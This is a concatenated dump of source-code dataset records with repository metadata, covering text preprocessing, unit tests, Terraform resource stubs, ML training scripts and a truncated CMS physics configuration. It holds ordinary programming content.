] | 1 | 2020-11-26T14:34:08.000Z | 2021-02-03T12:48:35.000Z | vectorize.py | orestislampridis/X-SPELLS | 4285888ef2c9cc5ef59756d363319599d8599e69 | [
"Apache-2.0"
] | null | null | null | """
Helper script used for turning text into tf-idf vector for the knn experiment
"""
import re
import numpy
from nltk import pos_tag
from nltk.corpus import stopwords
from nltk.corpus import wordnet
from nltk.stem import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.feature_extraction.text import TfidfVectorizer
def cleanText(text, lemmatize, stemmer):
"""Method for cleaning text. Removes numbers, punctuation, and capitalization. Stems or lemmatizes text."""
if isinstance(text, float):
text = str(text)
if isinstance(text, numpy.int64):
text = str(text)
try:
text = text.decode()
except AttributeError:
pass
text = re.sub(r"[^A-Za-z]", " ", text)
text = text.lower()
if lemmatize:
wordnet_lemmatizer = WordNetLemmatizer()
text_result = []
tokens = word_tokenize(text) # Generate list of tokens
tagged = pos_tag(tokens)
for t in tagged:
try:
text_result.append(wordnet_lemmatizer.lemmatize(t[0], get_tag(t[1][:2])))
except:
text_result.append(wordnet_lemmatizer.lemmatize(t[0]))
return text_result
if stemmer:
text_result = []
tokens = word_tokenize(text)
snowball_stemmer = SnowballStemmer('english')
for t in tokens:
text_result.append(snowball_stemmer.stem(t))
return text_result
| 32.317647 | 112 | 0.625774 | """
Helper script used for turning text into tf-idf vector for the knn experiment
"""
import re
import numpy
from nltk import pos_tag
from nltk.corpus import stopwords
from nltk.corpus import wordnet
from nltk.stem import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.feature_extraction.text import TfidfVectorizer
def cleanText(text, lemmatize, stemmer):
"""Method for cleaning text. Removes numbers, punctuation, and capitalization. Stems or lemmatizes text."""
if isinstance(text, float):
text = str(text)
if isinstance(text, numpy.int64):
text = str(text)
try:
text = text.decode()
except AttributeError:
pass
text = re.sub(r"[^A-Za-z]", " ", text)
text = text.lower()
if lemmatize:
wordnet_lemmatizer = WordNetLemmatizer()
def get_tag(tag):
if tag.startswith('J'):
return wordnet.ADJ
elif tag.startswith('V'):
return wordnet.VERB
elif tag.startswith('N'):
return wordnet.NOUN
elif tag.startswith('R'):
return wordnet.ADV
else:
return ''
text_result = []
tokens = word_tokenize(text) # Generate list of tokens
tagged = pos_tag(tokens)
for t in tagged:
try:
text_result.append(wordnet_lemmatizer.lemmatize(t[0], get_tag(t[1][:2])))
except:
text_result.append(wordnet_lemmatizer.lemmatize(t[0]))
return text_result
if stemmer:
text_result = []
tokens = word_tokenize(text)
snowball_stemmer = SnowballStemmer('english')
for t in tokens:
text_result.append(snowball_stemmer.stem(t))
return text_result
def createTFIDF(train, test, remove_stopwords, lemmatize, stemmer):
if remove_stopwords:
vectorizer = TfidfVectorizer(analyzer='word', input='content', stop_words=stopwords.words('english'))
else:
vectorizer = TfidfVectorizer(analyzer='word', input='content')
clean_train = []
for paragraph in train:
paragraph_result = cleanText(paragraph, lemmatize, stemmer)
paragraph = " ".join(str(x) for x in paragraph_result)
clean_train.append(paragraph)
paragraph_result = cleanText(test, lemmatize, stemmer)
paragraph = " ".join(str(x) for x in paragraph_result)
clean_test = paragraph
tfidf_train = vectorizer.fit_transform(clean_train).toarray()
tfidf_test = vectorizer.transform([clean_test]).toarray()
return tfidf_train, tfidf_test
| 1,151 | 0 | 58 |
1de486ee204679bd8893f40a41b6333021fd84bd | 81 | py | Python | ichnaea/tests/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | 1 | 2018-01-18T16:02:43.000Z | 2018-01-18T16:02:43.000Z | ichnaea/tests/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | null | null | null | ichnaea/tests/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | 1 | 2018-01-19T17:56:48.000Z | 2018-01-19T17:56:48.000Z | import os.path
DATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'data')
| 20.25 | 64 | 0.753086 | import os.path
DATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'data')
| 0 | 0 | 0 |
66bacfd2c886a3e584925a335ad2ea71c33c9b69 | 1,524 | py | Python | algo_test3.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | algo_test3.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | algo_test3.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# test = Solution()
# # print test.lexicographical('apple', 'appld')
# print test.trySet()
test = Solution3()
print test.canFinish([[1, 0], [2, 1], [2, 0]]) | 24.190476 | 63 | 0.489501 | # -*- coding: utf-8 -*-
class Solution(object):
# ้ๆๅ้
TAG = "Person"
def lexicographical(self, a, b):
for i in range(5, -1, -1):
print i
matrix = [
[1, 5, 9],
[10, 11, 13],
[12, 13, 15]
],
res = matrix[0]
for row in matrix[1:]:
res.extend(row)
changeTogether = [[float('-inf')] * 5] * 3
changeTogether[0][0] = 1
print changeTogether
print Solution.TAG
Solution2().printTwo()
return a > b
def isInteger(self, x):
if type(x) == int:
return True
else:
return False
def trySet(self):
res = []
for num in set([1, 2, 2, 5, 5, 5]):
res.append(num)
print max([1, 2, 2, 5, 5, 5])
return res
class Solution2(object):
def printTwo(self):
print '2'
class Solution3(object):
def canFinish(self, prerequisites):
neighboors = {}
# pre_course => [courses]
for prerequest in prerequisites:
if prerequest[1] in neighboors:
neighboors[prerequest[1]].append(prerequest[0])
else:
neighboors[prerequest[1]] = [prerequest[0]]
for neighboor in neighboors[0]:
print neighboor
# test = Solution()
# # print test.lexicographical('apple', 'appld')
# print test.trySet()
test = Solution3()
print test.canFinish([[1, 0], [2, 1], [2, 0]]) | 1,103 | 126 | 120 |
8d4eba3c2060dccdffd308731cd2c7d3744a9820 | 2,751 | py | Python | terrascript/resource/phillbaker/elasticsearch.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/resource/phillbaker/elasticsearch.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/resource/phillbaker/elasticsearch.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/resource/phillbaker/elasticsearch.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:15:48 UTC)
import terrascript
__all__ = [
"elasticsearch_component_template",
"elasticsearch_composable_index_template",
"elasticsearch_index",
"elasticsearch_index_template",
"elasticsearch_ingest_pipeline",
"elasticsearch_kibana_alert",
"elasticsearch_kibana_object",
"elasticsearch_opendistro_destination",
"elasticsearch_opendistro_ism_policy",
"elasticsearch_opendistro_ism_policy_mapping",
"elasticsearch_opendistro_kibana_tenant",
"elasticsearch_opendistro_monitor",
"elasticsearch_opendistro_role",
"elasticsearch_opendistro_roles_mapping",
"elasticsearch_opendistro_user",
"elasticsearch_snapshot_repository",
"elasticsearch_xpack_index_lifecycle_policy",
"elasticsearch_xpack_license",
"elasticsearch_xpack_role",
"elasticsearch_xpack_role_mapping",
"elasticsearch_xpack_snapshot_lifecycle_policy",
"elasticsearch_xpack_user",
"elasticsearch_xpack_watch",
]
| 22.365854 | 74 | 0.811705 | # terrascript/resource/phillbaker/elasticsearch.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:15:48 UTC)
import terrascript
class elasticsearch_component_template(terrascript.Resource):
pass
class elasticsearch_composable_index_template(terrascript.Resource):
pass
class elasticsearch_index(terrascript.Resource):
pass
class elasticsearch_index_template(terrascript.Resource):
pass
class elasticsearch_ingest_pipeline(terrascript.Resource):
pass
class elasticsearch_kibana_alert(terrascript.Resource):
pass
class elasticsearch_kibana_object(terrascript.Resource):
pass
class elasticsearch_opendistro_destination(terrascript.Resource):
pass
class elasticsearch_opendistro_ism_policy(terrascript.Resource):
pass
class elasticsearch_opendistro_ism_policy_mapping(terrascript.Resource):
pass
class elasticsearch_opendistro_kibana_tenant(terrascript.Resource):
pass
class elasticsearch_opendistro_monitor(terrascript.Resource):
pass
class elasticsearch_opendistro_role(terrascript.Resource):
pass
class elasticsearch_opendistro_roles_mapping(terrascript.Resource):
pass
class elasticsearch_opendistro_user(terrascript.Resource):
pass
class elasticsearch_snapshot_repository(terrascript.Resource):
pass
class elasticsearch_xpack_index_lifecycle_policy(terrascript.Resource):
pass
class elasticsearch_xpack_license(terrascript.Resource):
pass
class elasticsearch_xpack_role(terrascript.Resource):
pass
class elasticsearch_xpack_role_mapping(terrascript.Resource):
pass
class elasticsearch_xpack_snapshot_lifecycle_policy(terrascript.Resource):
pass
class elasticsearch_xpack_user(terrascript.Resource):
pass
class elasticsearch_xpack_watch(terrascript.Resource):
pass
__all__ = [
"elasticsearch_component_template",
"elasticsearch_composable_index_template",
"elasticsearch_index",
"elasticsearch_index_template",
"elasticsearch_ingest_pipeline",
"elasticsearch_kibana_alert",
"elasticsearch_kibana_object",
"elasticsearch_opendistro_destination",
"elasticsearch_opendistro_ism_policy",
"elasticsearch_opendistro_ism_policy_mapping",
"elasticsearch_opendistro_kibana_tenant",
"elasticsearch_opendistro_monitor",
"elasticsearch_opendistro_role",
"elasticsearch_opendistro_roles_mapping",
"elasticsearch_opendistro_user",
"elasticsearch_snapshot_repository",
"elasticsearch_xpack_index_lifecycle_policy",
"elasticsearch_xpack_license",
"elasticsearch_xpack_role",
"elasticsearch_xpack_role_mapping",
"elasticsearch_xpack_snapshot_lifecycle_policy",
"elasticsearch_xpack_user",
"elasticsearch_xpack_watch",
]
| 0 | 1,123 | 529 |
3dbd97084674df281038a2e53d7b34d293b49d15 | 1,579 | py | Python | pydm/tests/utilities/test_iconfont.py | klauer/pydm | e26aad58a7a0eb6f7321c61aa1dace646ff652bd | [
"BSD-3-Clause-LBNL"
] | null | null | null | pydm/tests/utilities/test_iconfont.py | klauer/pydm | e26aad58a7a0eb6f7321c61aa1dace646ff652bd | [
"BSD-3-Clause-LBNL"
] | null | null | null | pydm/tests/utilities/test_iconfont.py | klauer/pydm | e26aad58a7a0eb6f7321c61aa1dace646ff652bd | [
"BSD-3-Clause-LBNL"
] | null | null | null | import pytest
from ...utilities import iconfont
from ...PyQt import QtGui, QtCore
| 30.960784 | 93 | 0.69981 | import pytest
from ...utilities import iconfont
from ...PyQt import QtGui, QtCore
def test_icon_font_constructor(qtbot):
icon_f = iconfont.IconFont()
icon_f2 = iconfont.IconFont()
assert (icon_f is icon_f2)
def test_icon_font_load_font(qtbot):
icon_f = iconfont.IconFont()
with pytest.raises(OSError):
icon_f.char_map = None
icon_f.load_font('foo', icon_f.charmap_file)
with pytest.raises(OSError):
icon_f.char_map = None
icon_f.load_font(icon_f.charmap_file, 'foo')
icon_f.load_font(icon_f.font_file, icon_f.charmap_file)
assert (icon_f.char_map is not None)
def test_icon_font_get_char_for_name(qtbot):
icon_f = iconfont.IconFont()
c = icon_f.get_char_for_name('cogs')
assert (c == u'\uf085')
with pytest.raises(ValueError):
icon_f.get_char_for_name('foo')
def test_icon_font_font(qtbot):
icon_f = iconfont.IconFont()
f = icon_f.font(12)
assert(f.family() == icon_f.font_name)
assert(f.pixelSize() == 12)
def test_icon_font_icon(qtbot):
icon_f = iconfont.IconFont()
ico = icon_f.icon('cogs', color=None)
ico1 = icon_f.icon('cogs', color=QtGui.QColor(255, 0, 0))
with pytest.raises(ValueError):
ico_invalid = icon_f.icon('foo', color=None)
def test_char_icon_engine(qtbot):
engine = iconfont.CharIconEngine(iconfont.IconFont(), 'cogs', color=None)
pm = engine.pixmap(QtCore.QSize(32, 32), mode=QtGui.QIcon.Normal, state=QtGui.QIcon.On)
pm = engine.pixmap(QtCore.QSize(32, 32), mode=QtGui.QIcon.Disabled, state=QtGui.QIcon.On) | 1,354 | 0 | 138 |
5d8d397e6a8ca3fdf09cc0422991f6bb28d600a0 | 3,758 | py | Python | ex4/4_2_binary_classification/4_2_binary_classification.py | Jeilef/FoSA | d4b53bd687d06af80f91d4c7c96c1ef97708933f | [
"MIT"
] | null | null | null | ex4/4_2_binary_classification/4_2_binary_classification.py | Jeilef/FoSA | d4b53bd687d06af80f91d4c7c96c1ef97708933f | [
"MIT"
] | null | null | null | ex4/4_2_binary_classification/4_2_binary_classification.py | Jeilef/FoSA | d4b53bd687d06af80f91d4c7c96c1ef97708933f | [
"MIT"
] | null | null | null | import argparse, os
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVR
import pandas as pd
from scipy.io import arff
# to get the summary both logistic-regression and support-vector-machines have to be run once with the output errors option
if __name__ == "__main__":
parser = argparse.ArgumentParser('FSA')
parser.add_argument('--type', type=str, help='which kind of regression', choices=["logistic-regression", "support-vector-machine"])
parser.add_argument('--output-error-values', action='store_true', default=False, help='display error values instead of output')
parser.add_argument('--train', type=str, help='training dataset', default='MC2-train.arff')
parser.add_argument('--predict', type=str, help='prediction dataset', default='MC2-predict.arff')
args = parser.parse_args()
train_data_arff = arff.loadarff(args.train)
train_data = pd.DataFrame(train_data_arff[0])
train_data = train_data.fillna(0)
prediction_data = pd.DataFrame(arff.loadarff(args.predict)[0])
prediction_data = prediction_data.fillna(0)
if args.type == "logistic-regression":
model = train_log_reg(train_data)
else:
model = train_svm(train_data)
if args.output_error_values:
save_error_values(model, train_data, prediction_data, args.type)
else:
model_predict(model, prediction_data)
| 37.207921 | 135 | 0.685737 | import argparse, os
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVR
import pandas as pd
from scipy.io import arff
def train_svm(train_dataset):
cols = train_dataset.columns.values
x = train_dataset[cols[:-1]].to_numpy()
y = train_dataset[cols[-1]].to_numpy()
y = [i[0] for i in y]
# gamma = 2 since: gamma = 1/(2*sigma^2)
return SVR(kernel="rbf", C=1, gamma=2).fit(x, y)
def train_log_reg(train_dataset):
cols = train_dataset.columns.values
x = train_dataset[cols[:-1]].to_numpy()
y = train_dataset[cols[-1]].to_numpy()
y = [i[0] for i in y]
return LogisticRegression().fit(x, y)
def model_predict(model, predict_dataset, printing=True):
cols = predict_dataset.columns.values
x = predict_dataset[cols[:-1]].to_numpy()
prediction = model.predict(x)
if printing:
for p in prediction:
print(chr(int(p)))
return prediction
# to get the summary both logistic-regression and support-vector-machines have to be run once with the output errors option
def save_error_values(model, train_dataset, predict_dataset, model_type):
train_res = model_predict(model, train_dataset, printing=False)
pred_res = model_predict(model, predict_dataset, printing=False)
train_actual = actual_values(train_dataset)
pred_actual = actual_values(predict_dataset)
train_wrong = 0
pred_wrong = 0
for a, p in zip(train_actual, train_res):
if a != int(p):
train_wrong += 1
for a, p in zip(pred_actual, pred_res):
if a != int(p):
pred_wrong += 1
type_string = model_type + " error report\n"
train_error = "train error: " + str(train_wrong*100/len(train_actual)) + "%\n"
pred_error = "prediction error: " + str(pred_wrong * 100 / len(pred_actual)) + "%"
output_string = type_string + train_error + pred_error
with open(model_type + '-error-report.txt', 'w') as error_file:
error_file.write(output_string)
print(output_string)
if os.path.exists('support-vector-machine-error-report.txt') and os.path.exists('logistic-regression-error-report.txt'):
with open('error-report.txt', 'w') as error_report:
with open('logistic-regression-error-report.txt') as lr_report:
error_report.write(lr_report.read())
error_report.write('\n\n')
with open('support-vector-machine-error-report.txt') as svm_report:
error_report.write(svm_report.read())
def actual_values(dataset):
cols = dataset.columns.values
return [i[0] for i in dataset[cols[-1]].to_numpy()]
if __name__ == "__main__":
parser = argparse.ArgumentParser('FSA')
parser.add_argument('--type', type=str, help='which kind of regression', choices=["logistic-regression", "support-vector-machine"])
parser.add_argument('--output-error-values', action='store_true', default=False, help='display error values instead of output')
parser.add_argument('--train', type=str, help='training dataset', default='MC2-train.arff')
parser.add_argument('--predict', type=str, help='prediction dataset', default='MC2-predict.arff')
args = parser.parse_args()
train_data_arff = arff.loadarff(args.train)
train_data = pd.DataFrame(train_data_arff[0])
train_data = train_data.fillna(0)
prediction_data = pd.DataFrame(arff.loadarff(args.predict)[0])
prediction_data = prediction_data.fillna(0)
if args.type == "logistic-regression":
model = train_log_reg(train_data)
else:
model = train_svm(train_data)
if args.output_error_values:
save_error_values(model, train_data, prediction_data, args.type)
else:
model_predict(model, prediction_data)
| 2,246 | 0 | 114 |
327fc17dee8a883eb99c23c7dc2a82bf1781a06f | 757 | py | Python | ElectrospraySimulator/GUI_scripts/PredefinedFuns.py | DavidPoves/Liquid-meniscus-in-the-ionic-regime-simulator | 9a8cfce64ae2adb06c39418fdbbb187c75431c69 | [
"MIT"
] | null | null | null | ElectrospraySimulator/GUI_scripts/PredefinedFuns.py | DavidPoves/Liquid-meniscus-in-the-ionic-regime-simulator | 9a8cfce64ae2adb06c39418fdbbb187c75431c69 | [
"MIT"
] | null | null | null | ElectrospraySimulator/GUI_scripts/PredefinedFuns.py | DavidPoves/Liquid-meniscus-in-the-ionic-regime-simulator | 9a8cfce64ae2adb06c39418fdbbb187c75431c69 | [
"MIT"
] | null | null | null | import numpy as np
"""
Within this file, the predefined functions appearing in the main menu may be defined. If a new one is added, it must be
added to the attributes self.predef_funs_show and self.predef_funs of the PredefinedFunctions class from the MainMenu.py
file. Moreover, these functions must be added to the self.save method from the previous class.
"""
| 24.419355 | 120 | 0.660502 | import numpy as np
"""
Within this file, the predefined functions appearing in the main menu may be defined. If a new one is added, it must be
added to the attributes self.predef_funs_show and self.predef_funs of the PredefinedFunctions class from the MainMenu.py
file. Moreover, these functions must be added to the self.save method from the previous class.
"""
def TaylorCone(s):
r = ((1-2*s)*1)/(1-2*s*(1-s)*(1-20))
z = (2*(1-s)*s*20*(1/np.tan(np.radians(49.3)))*1)/(1-2*s*(1-s)*(1-20))
return r, z
def CosineFunction(r):
z = 0.5*np.cos(np.pi/2 * r)
return r, z
def ParabolicFunction(r):
vertex = [0, 0.5]
a = -(vertex[1])/(1-vertex[0])**2
z = a*(r-vertex[0])**2 + vertex[1]
return r, z
def StraightLine(r):
z = 0.5*(1-r)
return r, z
| 297 | 0 | 92 |
727e5a69e567a4226eac8c6955f63566c5e67590 | 1,284 | py | Python | algorithm/graph_theory/connected_cell/solution.py | delaanthonio/hackerrank | b1f2e1e93b3260be90eb3b8cb8e86e9a700acf27 | [
"MIT"
] | 1 | 2017-07-02T01:35:39.000Z | 2017-07-02T01:35:39.000Z | algorithm/graph_theory/connected_cell/solution.py | delaanthonio/hackerrank | b1f2e1e93b3260be90eb3b8cb8e86e9a700acf27 | [
"MIT"
] | null | null | null | algorithm/graph_theory/connected_cell/solution.py | delaanthonio/hackerrank | b1f2e1e93b3260be90eb3b8cb8e86e9a700acf27 | [
"MIT"
] | 1 | 2018-04-03T15:11:56.000Z | 2018-04-03T15:11:56.000Z | #!/usr/bin/env python3
"""
:problem: https://www.hackerrank.com/challenges/ctci-connected-cell-in-a-grid/problem
"""
from typing import List, Set, Tuple
Cell = Tuple[int, int]
if __name__ == '__main__':
main()
| 24.226415 | 85 | 0.492212 | #!/usr/bin/env python3
"""
:problem: https://www.hackerrank.com/challenges/ctci-connected-cell-in-a-grid/problem
"""
from typing import List, Set, Tuple
Cell = Tuple[int, int]
def dfs_region(grid: List[List[int]], visited: Set[Cell], start: Cell) -> int:
area = 0
if start in visited:
return 1
cells = [start]
while cells:
cell = cells.pop()
row = cell[0]
col = cell[1]
for i in range(row - 1, row + 2):
for j in range(col - 1, col + 2):
if grid[i][j] and (i, j) not in visited:
cells.append((i, j))
visited.add((i, j))
area += 1
return area
def main():
rows = int(input())
cols = int(input())
grid = []
grid.append([0] * (cols + 2))
for _ in range(rows):
grid.append([0] + [int(x) for x in input().split()] + [0])
grid.append([0] * (cols + 2))
max_area = 0
visited = set()
for i in range(1, rows + 1):
for j in range(1, cols + 1):
if grid[i][j]:
cell = (i, j)
area = dfs_region(grid, visited, cell)
if area > max_area:
max_area = area
print(max_area)
if __name__ == '__main__':
main()
| 1,018 | 0 | 46 |
bfb08d3994e7214fb72cf9fbaa7086621a4d8da3 | 4,713 | py | Python | FC.py | mahootiha-maryam/DL-for-image-analysis | 2e645341a6d3c54b2dbe31a04f96c2a06a5793c9 | [
"Apache-2.0"
] | null | null | null | FC.py | mahootiha-maryam/DL-for-image-analysis | 2e645341a6d3c54b2dbe31a04f96c2a06a5793c9 | [
"Apache-2.0"
] | null | null | null | FC.py | mahootiha-maryam/DL-for-image-analysis | 2e645341a6d3c54b2dbe31a04f96c2a06a5793c9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
This is a fully connected neural network.
It contains data batching , using Relu activation function,
using adam optimizer and dropout for overfitting.
'''
import torch
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn
data = pd.read_csv('bike_sharing.csv', index_col=0)
'''
plt.figure(figsize=(8, 6))
#x is yr y is cnt and coloring is based on the spring
sns.barplot('yr', 'cnt', hue = 'season', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per season')
'''
'''
plt.figure(figsize=(8, 6))
sns.barplot('mnth', 'cnt', hue = 'workingday', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per month')
'''
#get the seazon field and change each attribute to one column
data = pd.get_dummies(data, columns= ['season'])
#need just these columns
columns = ['registered', 'holiday', 'weekday',
'weathersit', 'temp', 'atemp',
'season_fall', 'season_spring',
'season_summer', 'season_winter']
#features are the input(xtrain) of neural network and target is the ytrain
features=data[columns]
target=data[['cnt']]
#use sklearn for dividing our data to train and test
from sklearn.model_selection import train_test_split
#80 percent of data is for training
X_train, x_test, Y_train, y_test = train_test_split(features,
target,
test_size=0.2)
#change to tensors
X_train_tensor = torch.tensor(X_train.values, dtype = torch.float)
x_test_tensor = torch.tensor(x_test.values, dtype = torch.float)
Y_train_tensor = torch.tensor(Y_train.values, dtype = torch.float)
y_test_tensor = torch.tensor(y_test.values, dtype = torch.float)
'''
batch the data
'''
#use data utils for batching
import torch.utils.data as data_utils
#tensordataset and loader both used to load multiple samples in parallel
train_data = data_utils.TensorDataset(X_train_tensor, Y_train_tensor)
train_loader = data_utils.DataLoader(train_data, batch_size=100, shuffle=True)
features_batch, target_batch = iter(train_loader).next()
inp = X_train_tensor.shape[1]
out = 1
hid = 10
loss_fn = torch.nn.MSELoss()
#making the neural network model
model = torch.nn.Sequential(torch.nn.Linear(inp, hid),
torch.nn.ReLU(),
#dropout is good for overfitting the p is the
#probability of deleting the neuron
torch.nn.Dropout(p=0.2),
torch.nn.Linear(hid, out))
#defining the optimizer
optimizer = torch.optim.Adam(model.parameters(), lr = 0.001)
##############################################
##make epochs based on the train loader size##
##############################################
total_step = len(train_loader)
num_epochs = 10000
#train model based on every batch data
for epoch in range(num_epochs + 1):
for i, (features, target) in enumerate(train_loader):
output = model(features)
loss = loss_fn(output, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch % 2000 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
#evaluate our model
model.eval()
#get all predicted y value for the all x test
with torch.no_grad():
y_pred_tensor = model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
#make a table for comparing between actual and predicted
compare_df = pd.DataFrame({'actual': np.squeeze(y_test.values), 'predicted': np.squeeze(y_pred)})
#show ten random samples of data frame
print(compare_df.sample(10))
print(sklearn.metrics.r2_score(y_test, y_pred))
'''
Pytorch allows our model to be saved. The parameters to the torch.save()
method are the model to be saved followed by the directory path where it
should be saved
'''
torch.save(model, 'my_model')
#We can load a saved model using the torch.load() method
saved_model = torch.load('my_model')
'''
#It is now used exactly how we used the model before it was saved
y_pred_tensor = saved_model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
'''
#comparing the predicted and actual values with plot
plt.figure(figsize=(12, 8))
plt.plot(y_pred, label='Predicted count')
plt.plot(y_test.values, label='Actual count')
plt.legend()
plt.show() | 30.406452 | 97 | 0.663484 | # -*- coding: utf-8 -*-
'''
This is a fully connected neural network.
It contains data batching , using Relu activation function,
using adam optimizer and dropout for overfitting.
'''
import torch
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn
data = pd.read_csv('bike_sharing.csv', index_col=0)
'''
plt.figure(figsize=(8, 6))
#x is yr y is cnt and coloring is based on the spring
sns.barplot('yr', 'cnt', hue = 'season', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per season')
'''
'''
plt.figure(figsize=(8, 6))
sns.barplot('mnth', 'cnt', hue = 'workingday', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per month')
'''
#get the seazon field and change each attribute to one column
data = pd.get_dummies(data, columns= ['season'])
#need just these columns
columns = ['registered', 'holiday', 'weekday',
'weathersit', 'temp', 'atemp',
'season_fall', 'season_spring',
'season_summer', 'season_winter']
#features are the input(xtrain) of neural network and target is the ytrain
features=data[columns]
target=data[['cnt']]
#use sklearn for dividing our data to train and test
from sklearn.model_selection import train_test_split
#80 percent of data is for training
X_train, x_test, Y_train, y_test = train_test_split(features,
target,
test_size=0.2)
#change to tensors
X_train_tensor = torch.tensor(X_train.values, dtype = torch.float)
x_test_tensor = torch.tensor(x_test.values, dtype = torch.float)
Y_train_tensor = torch.tensor(Y_train.values, dtype = torch.float)
y_test_tensor = torch.tensor(y_test.values, dtype = torch.float)
'''
batch the data
'''
#use data utils for batching
import torch.utils.data as data_utils
#tensordataset and loader both used to load multiple samples in parallel
train_data = data_utils.TensorDataset(X_train_tensor, Y_train_tensor)
train_loader = data_utils.DataLoader(train_data, batch_size=100, shuffle=True)
features_batch, target_batch = iter(train_loader).next()
inp = X_train_tensor.shape[1]
out = 1
hid = 10
loss_fn = torch.nn.MSELoss()
#making the neural network model
model = torch.nn.Sequential(torch.nn.Linear(inp, hid),
torch.nn.ReLU(),
#dropout is good for overfitting the p is the
#probability of deleting the neuron
torch.nn.Dropout(p=0.2),
torch.nn.Linear(hid, out))
#defining the optimizer
optimizer = torch.optim.Adam(model.parameters(), lr = 0.001)
##############################################
##make epochs based on the train loader size##
##############################################
total_step = len(train_loader)
num_epochs = 10000
#train model based on every batch data
for epoch in range(num_epochs + 1):
for i, (features, target) in enumerate(train_loader):
output = model(features)
loss = loss_fn(output, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch % 2000 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
#evaluate our model
model.eval()
#get all predicted y value for the all x test
with torch.no_grad():
y_pred_tensor = model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
#make a table for comparing between actual and predicted
compare_df = pd.DataFrame({'actual': np.squeeze(y_test.values), 'predicted': np.squeeze(y_pred)})
#show ten random samples of data frame
print(compare_df.sample(10))
print(sklearn.metrics.r2_score(y_test, y_pred))
'''
Pytorch allows our model to be saved. The parameters to the torch.save()
method are the model to be saved followed by the directory path where it
should be saved
'''
torch.save(model, 'my_model')
#We can load a saved model using the torch.load() method
saved_model = torch.load('my_model')
'''
#It is now used exactly how we used the model before it was saved
y_pred_tensor = saved_model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
'''
#comparing the predicted and actual values with plot
plt.figure(figsize=(12, 8))
plt.plot(y_pred, label='Predicted count')
plt.plot(y_test.values, label='Actual count')
plt.legend()
plt.show() | 0 | 0 | 0 |
9b0433912348ba45b8e9413dd40fe8c371f9ea92 | 11,956 | py | Python | HLTrigger/Configuration/python/HLT_75e33/modules/hltPhase2L3MuonsNoID_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:24:46.000Z | 2021-11-30T16:24:46.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltPhase2L3MuonsNoID_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 4 | 2021-11-29T13:57:56.000Z | 2022-03-29T06:28:36.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltPhase2L3MuonsNoID_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:16:05.000Z | 2021-11-30T16:16:05.000Z | import FWCore.ParameterSet.Config as cms
hltPhase2L3MuonsNoID = cms.EDProducer("MuonIdProducer",
CaloExtractorPSet = cms.PSet(
CenterConeOnCalIntersection = cms.bool(False),
ComponentName = cms.string('CaloExtractorByAssociator'),
DR_Max = cms.double(1.0),
DR_Veto_E = cms.double(0.07),
DR_Veto_H = cms.double(0.1),
DR_Veto_HO = cms.double(0.1),
DepositInstanceLabels = cms.vstring(
'ecal',
'hcal',
'ho'
),
